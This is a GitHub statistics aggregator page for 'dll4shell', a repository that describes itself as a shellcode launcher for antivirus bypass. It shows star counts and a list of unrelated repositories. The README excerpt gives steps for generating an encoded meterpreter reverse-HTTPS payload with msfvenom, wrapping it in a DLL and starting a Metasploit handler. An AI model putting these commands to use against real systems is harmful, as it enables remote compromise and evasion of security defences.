cepxeo/dll4shell

Shellcode launcher for AV bypass

C++Python
This is stars and forks stats for /cepxeo/dll4shell repository. As of 27 Apr, 2024 this repository has 202 stars and 40 forks.

C++ shellcode launcher A collection of DLL wrappers around various shellcode injection and obfuscation techniques. Based on the charlotte tool. Execution steps git clone https://github.com/cepxeo/dll4shell && cd dll4shell msfvenom -p windows/x64/meterpreter/reverse_https LHOST=YOUR_IP LPORT=443 EXITFUNC=thread -f raw -e x64/xor_dynamic -a x64 -o beacon.bin sudo apt install mingw-w64 python dll4shell.py -e xor -o dll sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https;...
Read on GithubGithub Stats Page
repotechsstarsweeklyforksweekly
ine-labs/AWSGoatPHPJavaScriptHCL1.5k07540
nv-tlabs/ASEPython5780890
icyguider/ShhhloaderPythonCC++85401570
ranaroussi/quantstatsPythonHTML3.5k07080
TachibanaYoshino/AnimeGANv2Python4.9k06920
7eu7d7/pixiv_AI_crawlerPythonJupyter NotebookShell5260380
IAIK/AEPICCC++Makefile1080120
ScanNet/ScanNetCObjective-CC++1.5k03400
lifting-bits/sleighCMakeC++Python860190
zuri-training/PROJ-31-debpayCSSHTMLPython60230